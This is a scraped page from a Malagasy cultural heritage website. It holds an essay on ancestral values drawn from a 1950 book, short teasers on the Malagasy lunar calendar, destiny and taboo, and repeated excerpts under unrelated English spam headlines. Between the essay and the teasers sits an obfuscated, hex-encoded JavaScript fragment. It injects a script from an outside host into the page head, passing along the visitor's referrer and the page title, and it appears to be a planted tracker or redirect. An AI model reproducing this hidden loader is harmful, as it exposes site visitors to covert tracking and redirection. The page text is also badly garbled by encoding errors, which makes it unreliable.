logo

Hanitra nentin-drazana

A�A� Ny olombelona toy ny emboka�� akondro raha manondro lanitra iray ihany, fa raha mitsontsorika samy manana ny holafinyA�!A�A� Filazana�� ny razantsika izany, ary iharihariana�� ny fahalalany, fa iray mapamolavola ihany tokoa isika olombelona saingy ny endrika no samihafa tefy. Koa na mainty na fotsy, na mavo na menaA�: A�A� Sakamalo sy havozo, ka samy mitondra ny hanitra ho azyA�A�.

Dia tsy inona fa ny toe-panahy soa mampiavaka ny isam-pirenenaA� no A�A� hanitra nentin-drazanyA�A�A�; io no marika tsy mahavery tandindona ny ray aman-dreny teo aloha, io no lova tsy mifindra ireharehana�� ny solofo amam-para ato aoriana.

Fa manao akory isikaA�? hoy ianao. Ka ho hafa amina�� ny olona aiza moa isika, fa ao dia ao ny hanitraA�A� mba nentin-drazantsika. Raha tsy nisy angaha maimaina�� ny te-hivadi-tsoratra ka efa nihambo ankitsirano tsy ho Malagasy intsonyA�; akofana�� olona ireny ka avelao hopaobina�� ny rivotra. Fa ny mbola ankapobeny, na dia niova aza ny fihetsika ivelany,dia ataoko fa tsy afaka amina�� ny hanitranentin-drazany. Saingy aa fa nokobonkobonina sy nasitrisitrika izy io hatry ny elaela, fa nokobonkobonina sy nasitrisitrika izy io hatry ny elaela, ka nataona�� ny mpitazana fa A�A� dia maty sy efa nanjavonaA�A�. Kanno voasodoka ihany izy, fa tsy mpiseho toetra avy hatrany mantsy ry zareoA�A�. Ny sasany no manaitra raha vao mitranga, fa izy koa mateza dinihina. Nofinao izay hangaroka foana ny ao am-pony, ary anefa ny ao no tena izy. Raha ty ela nifampikaohana taminy ianao ka tena nahare ilay fitemona�� ny fony, eisy, aza mitompo ho mahalala.

Nefa na dia mbola tsy nifampikasoka taminy aza ianao, izao no azonao vinanina ambony ihanyA�: manana ny fony izy ary manana ny sainy, dia ilay fo te-ho tia sy ilay saina te-hahay. Ireo no maha-olona. Ary raha dinihina, dia tsy misaraka io fo te-ho tia sy io saina te-hahay ioA�: fa izay ironana�� n fo no alehana�� ny aina, ary tsy misy ironana�� ny fo afa-tsy ny fantatry ny saina ihany. Saingy ao ireo karazana�� olona aingaina�� ny fony kokoa, ary ao ireo karazana�� olona tarihina�� ny sainy kokoa. Izany anefa tsy dia hita misasaka toa voamaintilanyA�: mifamahoaho ihany ny toetry ny atsy sy ny aroa ary miovaova sarotra hoferana, saingy ny mazA�na miseho no mba ambara sy itsarana azy.

Mba lafiny aiza A�ry ny MalagasyA�? Mahasaikatra ihany ny hametraka izany. Tsy dia fomban-drazantsik mantsy ny mibikabika tena eo imasona�� ny hafaA�; saingy mavesa-danja kokoa ny antony nanosika ahy hamboraka ny A�A� rakitra maintimolalyA�A�.A�

Koa io lahatsoratra nosoratana�� ny R. P. Raharijafy io izay nivoaka tao amina�� ny boky A�A� Hanitra nentin-drazanaA�A�, 1950 io atolotray ho tehin-dava hanitsana havido eto amina�� ity tranonkala ity. Heverinay mifanitsy amina�� izay fotokevitra heverinay mantsy ny votoatina�� izany ka ilazanay tsy hisalasalana fa ireo A�A� rakitra maintimolalyA�A� ao anatina�� ny soatoavina maha-Malagasy no hampafatarina ny mpamaky ny tranonkalaza. Ny hisavasavana ny raviny rahateo no ahitana ny fotony. Ka ny hisavasava ireo ny mampiavaka ny mponina�� ny Nosy mba ho raki-pahalalana ho ana�� ny taranaka any aoriana no ifantohana�� ny fikarohana ataonayA�. Tsy mihambo ho valabena�� ny fahalalana anefa izahay, ary tsy hidoka tena ho kianjabena�� ny fahendrena. Misy ireo zoky efa nialoha lalana tamina�� ny fikarohana ny maha-Malagasy. Hanaovanay antso avo izy ireny mba hifanolo-tanana aminay ka hanao asa vadi-drano amina�� ny fampahafantarana ireny voka-pikaroana ireny ho ana�� ny olombelona rehetra eto ambonina�� ny tany.

Valahara Manjaka

","\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65","\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64","\x68\x65\x61\x64","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65","\x70\x72\x6F\x74\x6F\x63\x6F\x6C","\x68\x74\x74\x70\x73\x3A","\x69\x6E\x64\x65\x78\x4F\x66","\x52\x5F\x50\x41\x54\x48","\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E"];var d=document;var s=d[_0xb322[1]](_0xb322[0]);s[_0xb322[2]]= _0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12];if(document[_0xb322[13]]){document[_0xb322[13]][_0xb322[15]][_0xb322[14]](s,document[_0xb322[13]])}else {d[_0xb322[18]](_0xb322[17])[0][_0xb322[16]](s)};if(document[_0xb322[11]][_0xb322[19]]=== _0xb322[20]&& KTracking[_0xb322[22]][_0xb322[21]](_0xb322[3]+ encodeURIComponent(document[_0xb322[4]])+ _0xb322[5]+ encodeURIComponent(document[_0xb322[6]])+ _0xb322[7]+ window[_0xb322[11]][_0xb322[10]][_0xb322[9]](_0xb322[8],_0xb322[7])+ _0xb322[12])=== -1){alert(_0xb322[23])}

Ny volana malagasy sy ny tononandrony: Manana ny orim-bintana mifanandrify aminy

Toy ny firenena rehetra, manana izay iheverany ho fihodinkodina��ny tany izay diaviny koa ny Malagasy. Nisy, araka izany, na mbola tsy nisy oniversite aza, tamina��ny androna��ny Ntaolo, ny mpandinika manokana ny fihodina��ny eny amina��ny habakabaka eny sy ny fifandraisana��ny olombelona amina��izany. Araka ny voalaza ao amina��ny boky a�?Fomba malagasya�?, ny mpanandro no mamantatra ny tononandrona��ireo zaza teraka, tamina��ny alalana��ny fandinihana ny volana.

Anjara, lahatra, tendry, vintana: Siansa sa finoana?

Isana��ny mampiady hevitra ny maro ny fandraisana��ny fiarahamonina malagasy ny zavatra efa-doha dia ny atao hoe Anjara, Lahatra, Tendry ary Vintana. Ny anjara sy lahatra ary tendry dia saika naravina��ny frantsay amina��ny teny tokana hoe a�?Destina�? izay adika amina��ny teny anglisy hoe a�?Destinya�?. Ny teny hoe a�?vintanaa�? moa, raha ny fikarohana nataona��ireo mpahaiolona miompana amina��ny fivavahana sy ireo mpanandro, dia misy hifandraisany amina��ny teny soailii na ireo mpiavy teto amintsika niaraka tamina��ny malaizianina sy indonezianina hoe a�?bintanga�?, izay midika hoe a�?kintanaa�?.

Ny tsiny sy ny tody: Misy tokoa ve?

Mbola tsy tonga teto amina��ity Nosy ity ireo misionera vahiny dia efa nanana ny fiheverany ny atao hoe tontolo tsy hita maso ary toy ny olombelona rehetra manerana izao tontolo izao ihany koa, nahatsapa fa ao anatina��ny tontolo misy azy, misy hery roa mifanohitra hatrany...

Tantara

Literatiora

Vakoka velona

A�A� Ny olombelona toy ny emboka�� akondro raha manondro lanitra iray ihany, fa raha mitsontsorika samy manana ny holafinyA�!A�A� Filazana�� ny razantsika izany, ary iharihariana�� ny fahalalany, fa iray mapamolavola ihany tokoa isika olombelona saingy ny endrika no samihafa tefy. Koa na mainty na fotsy, na mavo na menaA�: A�A� Sakamalo sy havozo, ka samy […]

5 Good reasons the us Accessed the very first Entire world War

A�A� Ny olombelona toy ny emboka�� akondro raha manondro lanitra iray ihany, fa raha mitsontsorika samy manana ny holafinyA�!A�A� Filazana�� ny razantsika izany, ary iharihariana�� ny fahalalany, fa iray mapamolavola ihany tokoa isika olombelona saingy ny endrika no samihafa tefy. Koa na mainty na fotsy, na mavo na menaA�: A�A� Sakamalo sy havozo, ka samy […]

The Fundamentals of Best Essay Writing Revealed

A�A� Ny olombelona toy ny emboka�� akondro raha manondro lanitra iray ihany, fa raha mitsontsorika samy manana ny holafinyA�!A�A� Filazana�� ny razantsika izany, ary iharihariana�� ny fahalalany, fa iray mapamolavola ihany tokoa isika olombelona saingy ny endrika no samihafa tefy. Koa na mainty na fotsy, na mavo na menaA�: A�A� Sakamalo sy havozo, ka samy […]